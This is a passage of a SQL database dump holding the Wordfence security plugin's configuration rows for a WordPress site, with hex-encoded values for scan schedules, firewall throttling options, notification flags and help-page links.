3b18a133956ab864f6f08e3d3e2ccf12bef70fcdd959ce093c4491783f9acde124edee8cdc94d799cfc8f19a7280ce173b3bef379fdc17c71ae1ea7af68e4f47d859ca1aec619c394f9ef898738abfe265f0ba8e49cf666bef16b2de7aad5f0adf2a37c7bc84ebe9dd193efae1dc6777dfee67cef1e7ceff82e2e28dacc853beaf9a122f2c3bc287ed896ce8fdbbaf393ddd5fc0422f9e970752e3749e1e7a5455cf1d08d2b5ee773a5df617e693b9eab7ffbc0af6efce0d72366f2eb86675cd3c5836b359673ade54e7e53d885dffc3b9deb6ef6e1ba3b83f96de305ae9feccef5db3e72fdb5486ea87ccc1f43c77093e17dfe3440853fadabe5d6bfb6f2d7dc25fc4dcf8ebf597ee47fa785f38fb15e8c036733f762e9daaf5114f25014e71589d2365d513e5127fd5dbe88ea6a0751ab7d21ea655764f0e8e5a235215186e4848b7680bf68c7678af67d4f191a385774227e119d584fd129ce16dd8e0132eca4b1e81def2ac3c7348bfea024d13fb3430cfa5f1783affbc480facb28ed18194587c4d0c248c63c3828632a41c69964ca446a9549cba3644aa2ba4c6d369719dbde8ae91335b1c85612ab51b162754a536c558ac53606c4b6a687d8d6be12db777f8a5df254b19fda29f35bcc6441e2485978da551682a338ce2a9425e6cab2d48c65694c9438b9ab8ad3ab34593574a4acda5423ab0e3b8b57498aacf5f115efe17fc9bae61cf12909175f2b4b593f7b8cf8f75790bf344ce4afe004d9ba334db605284a90e77ad969a5283bf38b25d8d358f627bb4a887a9b1c4cd29283ff7693d0983e72789087840d6b9088782b89b4e82e915782e484c65a39f1a38b4435f59698ce3fe454e25089dd582d092b4e48e2918b92585628296b5e4b4a6084a4ece927a963fd257546819c530e93f3692324d3ad48b206844996cb73c9aad82259b52572f5d311b9362741b21d2224272a5272edad25d7a940f2debac99d9c52c93f5424f9a1ee5230314a0a27ce934213557990562a0f750ae47190933cfede458a771649714da014b7b64849ce67793ad04a9ece3c24a563caa4b4ad40ca1d8e49f97e0b79befe8b54787b48c5b6b952591d20558d77e4655badbcfaad426ade9a4b4ddb5aa93d7e42ea82d7c93b85d9f24ecb45de4dc893fa39280dfd7b4bc3db8fd2d09e258d2ebda569b88b7c32da202d93b5e4cbd966f952912bad07bb48eb155f69bd3e47be66cd93af0567e56b7b907ceda895f6ed7fcab7c151d231dd5d3ab6994847fc22e9a86e90cefb4be4e71a53f9f9204df095a6d0a724618badc2cda9c3666cff3fc9775a6ac8910300, 'no');
INSERT INTO `zdenl_wfconfig` (`name`, `val`, `autoload`) VALUES
('manualScanType', 0x6f6e63654461696c79, 'yes'),
('max404Crawlers', 0x44495341424c4544, 'yes'),
('max404Crawlers_action', 0x7468726f74746c65, 'yes'),
('max404Humans', 0x44495341424c4544, 'yes'),
('max404Humans_action', 0x7468726f74746c65, 'yes'),
('maxExecutionTime', 0x30, 'yes'),
('maxGlobalRequests', 0x44495341424c4544, 'yes'),
('maxGlobalRequests_action', 0x7468726f74746c65, 'yes'),
('maxMem', 0x323536, 'yes'),
('maxRequestsCrawlers', 0x44495341424c4544, 'yes'),
('maxRequestsCrawlers_action', 0x7468726f74746c65, 'yes'),
('maxRequestsHumans', 0x44495341424c4544, 'yes'),
('maxRequestsHumans_action', 0x7468726f74746c65, 'yes'),
('migration636_email_summary_excluded_directories', 0x31, 'no'),
('needsNewTour_blocking', 0x31, 'yes'),
('needsNewTour_dashboard', 0x31, 'yes'),
('needsNewTour_firewall', 0x31, 'yes'),
('needsNewTour_livetraffic', 0x31, 'yes'),
('needsNewTour_loginsecurity', 0x30, 'yes'),
('needsNewTour_scan', 0x30, 'yes'),
('needsUpgradeTour_blocking', 0x30, 'yes'),
('needsUpgradeTour_dashboard', 0x30, 'yes'),
('needsUpgradeTour_firewall', 0x30, 'yes'),
('needsUpgradeTour_livetraffic', 0x30, 'yes'),
('needsUpgradeTour_loginsecurity', 0x30, 'yes'),
('needsUpgradeTour_scan', 0x30, 'yes'),
('neverBlockBG', 0x6e65766572426c6f636b5665726966696564, 'yes'),
('noc1ScanSchedule', 0x613a333a7b693a303b693a313539373133393430303b693a313b693a313539373339383630303b693a323b693a313539373635373830303b7d, 'yes'),
('notification_blogHighlights', 0x31, 'yes'),
('notification_productUpdates', 0x31, 'yes'),
('notification_promotions', 0x31, 'yes'),
('notification_scanStatus', 0x31, 'yes'),
('notification_securityAlerts', 0x31, 'yes'),
('notification_updatesNeeded', 0x31, 'yes'),
('onboardingAttempt1', 0x6c6963656e7365, 'yes'),
('onboardingAttempt2', '', 'no'),
('onboardingAttempt3', '', 'no'),
('onboardingAttempt3Initial', 0x30, 'yes'),
('originalScheduledScanStart', 0x31353936383830343630, 'yes'),
('other_blockBadPOST', 0x30, 'yes'),
('other_bypassLitespeedNoabort', 0x30, 'yes'),
('other_hideWPVersion', 0x30, 'yes'),
('other_pwStrengthOnUpdate', 0x31, 'yes'),
('other_scanComments', 0x31, 'yes'),
('other_scanOutside', 0x30, 'yes'),
('other_WFNet', 0x31, 'yes'),
('previousWflogsFileList', 0x5b222e6874616363657373222c226970732e706870222c22636f6e6669672e706870222c2261747461636b2d646174612e706870222c2272756c65732e706870222c22636f6e6669672d73796e6365642e706870222c22636f6e6669672d6c6976657761662e706870222c22636f6e6669672d7472616e7369656e742e706870222c2247656f4c697465322d436f756e7472792e6d6d6462222c2274656d706c6174652e706870225d, 'yes'),
('scanFileProcessing', '', 'yes'),
('scansEnabled_checkGSB', 0x31, 'yes'),
('scansEnabled_checkHowGetIPs', 0x31, 'yes'),
('scansEnabled_checkReadableConfig', 0x31, 'yes'),
('scansEnabled_comments', 0x31, 'yes'),
('scansEnabled_core', 0x31, 'yes'),
('scansEnabled_coreUnknown', 0x31, 'yes'),
('scansEnabled_diskSpace', 0x31, 'yes'),
('scansEnabled_fileContents', 0x31, 'yes'),
('scansEnabled_fileContentsGSB', 0x31, 'yes'),
('scansEnabled_geoipSupport', 0x31, 'yes'),
('scansEnabled_highSense', 0x30, 'yes'),
('scansEnabled_malware', 0x31, 'yes'),
('scansEnabled_oldVersions', 0x31, 'yes'),
('scansEnabled_options', 0x31, 'yes'),
('scansEnabled_passwds', 0x31, 'yes'),
('scansEnabled_plugins', 0x30, 'yes'),
('scansEnabled_posts', 0x31, 'yes'),
('scansEnabled_scanImages', 0x30, 'yes'),
('scansEnabled_suspectedFiles', 0x31, 'yes'),
('scansEnabled_suspiciousAdminUsers', 0x31, 'yes'),
('scansEnabled_suspiciousOptions', 0x31, 'yes'),
('scansEnabled_themes', 0x30, 'yes'),
('scansEnabled_wafStatus', 0x31, 'yes'),
('scansEnabled_wpscan_directoryListingEnabled', 0x31, 'yes'),
('scansEnabled_wpscan_fullPathDisclosure', 0x31, 'yes'),
('scanStageStatuses', 0x613a31313a7b733a31333a227370616d766572746973696e67223b613a343a7b733a363a22737461747573223b733a373a227072656d69756d223b733a373a2273746172746564223b693a303b733a383a2266696e6973686564223b693a303b733a383a226578706563746564223b693a303b7d733a343a227370616d223b613a343a7b733a363a22737461747573223b733a373a227072656d69756d223b733a373a2273746172746564223b693a303b733a383a2266696e6973686564223b693a303b733a383a226578706563746564223b693a303b7d733a393a22626c61636b6c697374223b613a343a7b733a363a22737461747573223b733a373a227072656d69756d223b733a373a2273746172746564223b693a303b733a383a2266696e6973686564223b693a303b733a383a226578706563746564223b693a303b7d733a363a22736572766572223b613a343a7b733a363a22737461747573223b733a31363a22636f6d706c6574652d73756363657373223b733a373a2273746172746564223b693a343b733a383a2266696e6973686564223b693a343b733a383a226578706563746564223b693a343b7d733a373a226368616e676573223b613a343a7b733a363a22737461747573223b733a31363a22636f6d706c6574652d73756363657373223b733a373a2273746172746564223b693a323b733a383a2266696e6973686564223b693a323b733a383a226578706563746564223b693a323b7d733a363a227075626c6963223b613a343a7b733a363a22737461747573223b733a31363a22636f6d706c6574652d73756363657373223b733a373a2273746172746564223b693a323b733a383a2266696e6973686564223b693a323b733a383a226578706563746564223b693a323b7d733a373a226d616c77617265223b613a343a7b733a363a22737461747573223b733a31363a22636f6d706c6574652d73756363657373223b733a373a2273746172746564223b693a333b733a383a2266696e6973686564223b693a333b733a383a226578706563746564223b693a333b7d733a373a22636f6e74656e74223b613a343a7b733a363a22737461747573223b733a31363a22636f6d706c6574652d73756363657373223b733a373a2273746172746564223b693a333b733a383a2266696e6973686564223b693a333b733a383a226578706563746564223b693a333b7d733a383a2270617373776f7264223b613a343a7b733a363a22737461747573223b733a31363a22636f6d706c6574652d73756363657373223b733a373a2273746172746564223b693a313b733a383a2266696e6973686564223b693a313b733a383a226578706563746564223b693a313b7d733a31333a2276756c6e65726162696c697479223b613a343a7b733a363a22737461747573223b733a31363a22636f6d706c6574652d7761726e696e67223b733a373a2273746172746564223b693a313b733a383a2266696e6973686564223b693a313b733a383a226578706563746564223b693a313b7d733a373a226f7074696f6e73223b613a343a7b733a363a22737461747573223b733a31363a22636f6d706c6574652d73756363657373223b733a373a2273746172746564223b693a323b733a383a2266696e6973686564223b693a323b733a383a226578706563746564223b693a323b7d7d, 'no'),
('scanTime', 0x313539363938303639342e39313031, 'yes'),
('scanType', 0x7374616e64617264, 'yes'),
('scan_exclude', 0x77702d636f6e74656e742f706c7567696e732f556c74696d6174655f56435f4164646f6e732f6173736574732f6a732f76632d66726f6e74656469746f722e6a730a77702d636f6e74656e742f706c7567696e732f726576736c696465722f7075626c69632f6173736574732f6173736574732f7376672f696d6167652f69635f6578706f737572655f6e65675f315f323470782e7376670a77702d636f6e74656e742f706c7567696e732f726576736c696465722f7075626c69632f6173736574732f6173736574732f7376672f6e617669676174696f6e2f69635f6172726f775f7570776172645f323470782e737667, 'yes'),
('scan_include_extra', '', 'yes'),
('scan_maxDuration', '', 'yes'),
('scan_maxIssues', 0x31303030, 'yes'),
('schedMode', 0x6175746f, 'yes'),
('schedStartHour', 0x3131, 'yes'),
('scheduledScansEnabled', 0x31, 'yes'),
('serverDNS', 0x313539373730393536363b38363338383b3231372e3131362e3139382e313639, 'yes'),
('serverIP', 0x313539363838303931323b3231372e3131362e3139382e313639, 'yes'),
('showAdminBarMenu', 0x31, 'yes'),
('showWfCentralUI', 0x31, 'yes'),
('signatureUpdateTime', 0x31353936363733303736, 'yes'),
('spamvertizeCheck', 0x31, 'yes'),
('ssl_verify', 0x31, 'yes'),
('startScansRemotely', 0x30, 'yes'),
('supportContent', 0x7b22746f70223a5b7b227469746c65223a22426c6f636b696e672054726f75626c6573686f6f74696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f626c6f636b696e675c2f74726f75626c6573686f6f74696e675c2f222c226f72646572223a307d2c7b227469746c65223a224f7074696d697a696e6720546865204669726577616c6c222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f6f7074696d697a696e672d7468652d6669726577616c6c5c2f222c226f72646572223a317d2c7b227469746c65223a22576f726466656e636520576562204170706c69636174696f6e204669726577616c6c202857414629222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f222c226f72646572223a327d2c7b227469746c65223a225363616e2054726f75626c6573686f6f74696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f7363616e5c2f74726f75626c6573686f6f74696e675c2f222c226f72646572223a337d2c7b227469746c65223a22576f726466656e636520616e64204c6974655370656564222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f616476616e6365645c2f73797374656d2d726571756972656d656e74735c2f6c69746573706565645c2f222c226f72646572223a347d2c7b227469746c65223a2254776f2d466163746f722041757468656e7469636174696f6e222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f746f6f6c735c2f74776f2d666163746f722d61757468656e7469636174696f6e5c2f222c226f72646572223a357d2c7b227469746c65223a224669726577616c6c204c6561726e696e67204d6f6465222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f6c6561726e696e672d6d6f64655c2f222c226f72646572223a367d2c7b227469746c65223a225363616e20526573756c7473222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f7363616e5c2f7363616e2d726573756c74735c2f222c226f72646572223a377d2c7b227469746c65223a224920616d206c6f636b6564206f7574206f66206d792073697465222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f626c6f636b696e675c2f23692d616d2d6c6f636b65642d6f75742d6f662d6d792d73697465222c226f72646572223a387d2c7b227469746c65223a2250485020466174616c206572726f723a204661696c6564206f70656e696e6720726571756972656420776f726466656e63652d7761662e706870222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f237068702d666174616c2d6572726f722d6661696c65642d6f70656e696e672d72657175697265642d776f726466656e63652d7761662d706870222c226f72646572223a397d5d2c22616c6c223a5b7b227469746c65223a22576f726466656e63652043656e7472616c222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f63656e7472616c5c2f222c2265786365727074223a22576f726466656e63652043656e7472616c2070726f7669646573206120706f77657266756c20616e6420656666696369656e742077617920746f206d616e61676520746865207365637572697479206f66206d616e7920576f726450726573732073697465732076696120612073696e676c6520696e746572666163652e222c226368696c6472656e223a5b7b227469746c65223a225573696e67207468652053657474696e67732070616765222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f63656e7472616c5c2f73657474696e67735c2f222c226f72646572223a307d2c7b227469746c65223a22436f6e6e656374696e6720796f757220736974657320746f20576f726466656e63652043656e7472616c222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f63656e7472616c5c2f636f6e6e6563745c2f222c226f72646572223a317d2c7b227469746c65223a2253657474696e672075702074776f2d666163746f722061757468656e7469636174696f6e222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f63656e7472616c5c2f3266615c2f222c226f72646572223a327d2c7b227469746c65223a225573696e67207468652044617368626f6172642070616765222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f63656e7472616c5c2f63656e7472616c5c2f222c226f72646572223a337d2c7b227469746c65223a2256696577696e67207363616e2046696e64696e6773222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f63656e7472616c5c2f66696e64696e67735c2f222c226f72646572223a347d2c7b227469746c65223a225573696e672074686520436f6e66696775726174696f6e2070616765222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f63656e7472616c5c2f636f6e66696775726174696f6e5c2f222c226f72646572223a357d2c7b227469746c65223a225573696e6720576f726466656e636520706c7567696e206f7074696f6e732054656d706c61746573222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f63656e7472616c5c2f74656d706c617465735c2f222c226f72646572223a367d5d2c226f72646572223a307d2c7b227469746c65223a2244617368626f617264222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f64617368626f6172645c2f222c2265786365727074223a2254686520576f726466656e63652044617368626f6172642070726f766964657320696e736967687420696e746f207468652063757272656e74207374617465206f6620796f75722073697465e28099732073656375726974792e222c226368696c6472656e223a5b7b227469746c65223a224f7074696f6e73222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f64617368626f6172645c2f6f7074696f6e735c2f222c226f72646572223a307d2c7b227469746c65223a22416c65727473222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f64617368626f6172645c2f616c657274735c2f222c226f72646572223a317d5d2c226f72646572223a317d2c7b227469746c65223a224669726577616c6c222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f222c2265786365727074223a2254686520576f726466656e636520576562204170706c69636174696f6e204669726577616c6c2069732061205048502062617365642c206170706c69636174696f6e206c6576656c206669726577616c6c20746861742066696c74657273206f7574206d616c6963696f757320726571756573747320746f20796f757220736974652e20222c226368696c6472656e223a5b7b227469746c65223a224f7074696d697a696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f6f7074696d697a696e672d7468652d6669726577616c6c5c2f222c226f72646572223a307d2c7b227469746c65223a224c6561726e696e67204d6f6465222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f6c6561726e696e672d6d6f64655c2f222c226f72646572223a317d2c7b227469746c65223a2253746174697374696373222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f737461746973746963735c2f222c226f72646572223a327d2c7b227469746c65223a224f7074696f6e73222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f6f7074696f6e735c2f222c226f72646572223a337d2c7b227469746c65223a224d7953514c692073746f7261676520656e67696e65222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f6d7973716c692d73746f726167652d656e67696e655c2f222c226f72646572223a347d2c7b227469746c65223a22427275746520466f7263652050726f74656374696f6e222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f62727574652d666f7263655c2f222c226f72646572223a357d2c7b227469746c65223a2252617465204c696d6974696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f726174652d6c696d6974696e675c2f222c226f72646572223a367d2c7b227469746c65223a2254726f75626c6573686f6f74696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6669726577616c6c5c2f74726f75626c6573686f6f74696e675c2f222c226f72646572223a377d5d2c226f72646572223a327d2c7b227469746c65223a22426c6f636b696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f626c6f636b696e675c2f222c2265786365727074223a2241736964652066726f6d20746865204669726577616c6c2072756c657320746861742070726f7465637420616761696e73742053514c2d696e6a656374696f6e2c2058535320616e64206d6f72652c20576f726466656e636520616c736f2068617320637573746f6d20666561747572657320666f72206164646974696f6e616c20626c6f636b696e672e20222c226368696c6472656e223a5b7b227469746c65223a22436f756e74727920426c6f636b696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f626c6f636b696e675c2f636f756e7472792d626c6f636b696e675c2f222c226f72646572223a307d2c7b227469746c65223a22426c6f636b696e672054726f75626c6573686f6f74696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f626c6f636b696e675c2f74726f75626c6573686f6f74696e675c2f222c226f72646572223a317d5d2c226f72646572223a337d2c7b227469746c65223a225363616e222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f7363616e5c2f222c2265786365727074223a224120576f726466656e6365207363616e206578616d696e657320616c6c2066696c6573206f6e20796f757220576f726450726573732077656273697465206c6f6f6b696e6720666f72206d616c6963696f757320636f64652c206261636b646f6f72732c207368656c6c732074686174206861636b657273206861766520696e7374616c6c65642c206b6e6f776e206d616c6963696f75732055524c7320616e64206b6e6f776e207061747465726e73206f6620696e66656374696f6e732e222c226368696c6472656e223a5b7b227469746c65223a224f7074696f6e73222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f7363616e5c2f6f7074696f6e735c2f222c226f72646572223a307d2c7b227469746c65223a22526573756c7473222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f7363616e5c2f7363616e2d726573756c74735c2f222c226f72646572223a317d2c7b227469746c65223a225363686564756c696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f7363616e5c2f7363686564756c696e675c2f222c226f72646572223a327d2c7b227469746c65223a2254726f75626c6573686f6f74696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f7363616e5c2f74726f75626c6573686f6f74696e675c2f222c226f72646572223a337d5d2c226f72646572223a347d2c7b227469746c65223a22546f6f6c73222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f746f6f6c735c2f222c2265786365727074223a22576f726466656e636520546f6f6c7320696e636c7564652054776f20466163746f722041757468656e7469636174696f6e2c2057686f6973204c6f6f6b75702c2050617373776f72642041756469742c204c697665205472616666696320616e6420446961676e6f73746963732e222c226368696c6472656e223a5b7b227469746c65223a22496d706f72745c2f4578706f7274222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f746f6f6c735c2f696d706f72742d6578706f72745c2f222c226f72646572223a307d2c7b227469746c65223a2250617373776f7264204175646974696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f746f6f6c735c2f70617373776f72642d6175646974696e675c2f222c226f72646572223a317d2c7b227469746c65223a2257686f6973204c6f6f6b7570222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f746f6f6c735c2f77686f69732d6c6f6f6b75705c2f222c226f72646572223a327d2c7b227469746c65223a22446961676e6f7374696373222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f746f6f6c735c2f646961676e6f73746963735c2f222c226f72646572223a337d2c7b227469746c65223a224c6976652054726166666963222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f746f6f6c735c2f6c6976652d747261666669635c2f222c226f72646572223a347d2c7b227469746c65223a2254776f2d466163746f722041757468656e7469636174696f6e222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f746f6f6c735c2f74776f2d666163746f722d61757468656e7469636174696f6e5c2f222c226f72646572223a357d2c7b227469746c65223a224c65676163792054776f2d466163746f722041757468656e7469636174696f6e222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f746f6f6c735c2f6c65676163792d74776f2d666163746f722d61757468656e7469636174696f6e5c2f222c226f72646572223a367d5d2c226f72646572223a357d2c7b227469746c65223a224c6f67696e205365637572697479222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6c6f67696e2d73656375726974795c2f222c2265786365727074223a22546865204c6f67696e20536563757269747920706167652063757272656e746c7920636f6e7461696e732073657474696e677320666f722074776f2d666163746f722061757468656e7469636174696f6e20283246412920616e64207265434150544348412e20496e20612066757475726520576f726466656e63652076657273696f6e2c206578697374696e67206c6f67696e2d72656c617465642066656174757265732077696c6c20616c736f206d6f766520746f207468652073616d6520706167652e222c226f72646572223a367d2c7b227469746c65223a22416476616e636564222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f616476616e6365645c2f222c2265786365727074223a22496620796f752077616e7420746f206b6e6f77206d6f72652061626f75742074686520746563686e6963616c2064657461696c73206f6620576f726466656e63652c20796f75276c6c2066696e642074686520616e737765727320696e20746869732073656374696f6e2e222c226368696c6472656e223a5b7b227469746c65223a2253797374656d20726571756972656d656e7473222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f616476616e6365645c2f73797374656d2d726571756972656d656e74735c2f222c226f72646572223a307d2c7b227469746c65223a224368616e67656c6f67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f616476616e6365645c2f6368616e67656c6f675c2f222c226f72646572223a317d2c7b227469746c65223a2252656d6f7665206f72205265736574222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f616476616e6365645c2f72656d6f76652d6f722d72657365745c2f222c226f72646572223a327d2c7b227469746c65223a22546563686e6963616c2044657461696c73222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f616476616e6365645c2f746563686e6963616c2d64657461696c735c2f222c226f72646572223a337d2c7b227469746c65223a22436f6e7374616e7473222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f616476616e6365645c2f636f6e7374616e74735c2f222c226f72646572223a347d2c7b227469746c65223a22576f726466656e636520415049222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f616476616e6365645c2f776f726466656e63652d6170695c2f222c226f72646572223a357d2c7b227469746c65223a2254726f75626c6573686f6f74696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f616476616e6365645c2f74726f75626c6573686f6f74696e675c2f222c226f72646572223a367d5d2c226f72646572223a377d2c7b227469746c65223a22576f726466656e6365205072656d69756d222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f7072656d69756d5c2f222c2265786365727074223a22576f726466656e6365205072656d69756d20636f6d6573207769746820616e20495020426c61636b6c6973742c205265616c2054696d652050726f74656374696f6e20616e64206d756368206d6f72652e222c226368696c6472656e223a5b7b227469746c65223a224163636f756e74222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f7072656d69756d5c2f6163636f756e745c2f222c226f72646572223a307d2c7b227469746c65223a2250726963696e67222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f7072656d69756d5c2f70726963696e675c2f222c226f72646572223a317d2c7b227469746c65223a224c6963656e7365204b6579222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f7072656d69756d5c2f6170692d6b65795c2f222c226f72646572223a327d5d2c226f72646572223a387d2c7b227469746c65223a22576f726466656e636520616e642047445052202d2047656e6572616c20446174612050726f74656374696f6e20526567756c6174696f6e222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f67656e6572616c2d646174612d70726f74656374696f6e2d726567756c6174696f6e5c2f222c2265786365727074223a2244656669616e742c2074686520636f6d70616e7920626568696e6420576f726466656e63652c20686173207570646174656420697473207465726d73206f66207573652c207072697661637920706f6c696369657320616e6420736f6674776172652c2061732077656c6c206173206d61646520617661696c61626c65206120646174612070726f63657373696e672061677265656d656e7420746f206d656574204744505220636f6d706c69616e63652e20437573746f6d657273206d7573742072657669657720616e6420616772656520746f2075706461746564207465726d7320696e206f7264657220746f20636f6e74696e7565207573696e67206f75722070726f647563747320616e642073657276696365732e20576520616c736f2070726f76696465206120646174612070726f63657373696e672061677265656d656e7420696620796f75207175616c6966792061732061206461746120636f6e74726f6c6c657220756e6465722074686520474450522e222c226f72646572223a397d2c7b227469746c65223a225369746520436c65616e696e6720616e6420536563757269747920417564697473222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f73656375726974792d73657276696365735c2f222c2265786365727074223a224c6574206f6e65206f66206f757220536563757269747920416e616c797374732068656c7020796f7520636c65616e20796f757220696e6665637465642073697465206f7220696e737065637420697420666f722076756c6e65726162696c69746965732e222c226f72646572223a31307d2c7b227469746c65223a224c6f67696e20536563757269747920506c7567696e222c227065726d616c696e6b223a2268747470733a5c2f5c2f7777772e776f726466656e63652e636f6d5c2f68656c705c2f6c6f67696e2d73656375726974792d706c7567696e5c2f222c2265786365727074223a2254686520576f726466656e6365204c6f67696e20536563757269747920706c7567696e20636f6e7461696e73206120737562736574206f662074686520666561747572657320666f756e6420696e207468652066756c6c20576f726466656e636520706c7567696e3a2054776f2d666163746f722041757468656e7469636174696f6e2c20584d4c2d5250432050726f74656374696f6e20616e64204c6f67696e205061676520434150544348412e20497420697320696465616c20666f722073697465732074686174206e656564206c6f67696e2073656375726974792066756e6374696f6e616c69747920627574206569746865722063616ee2809974206f7220646f6ee28099742077616e7420746f2072756e207468652066756c6c20576f726466656e636520706c7567696e2e222c226f72646572223a31317d5d7d, 'yes'),
('supportHash', 0x63643435383664343561336235623634383738363337616532373465393036333632303665343266373736663864343536613632303361366266396565643633, 'yes'),
('timeoffset_wf', 0x2d323630, 'yes'),
('timeoffset_wf_updated', 0x31353936393830363835, 'yes'),
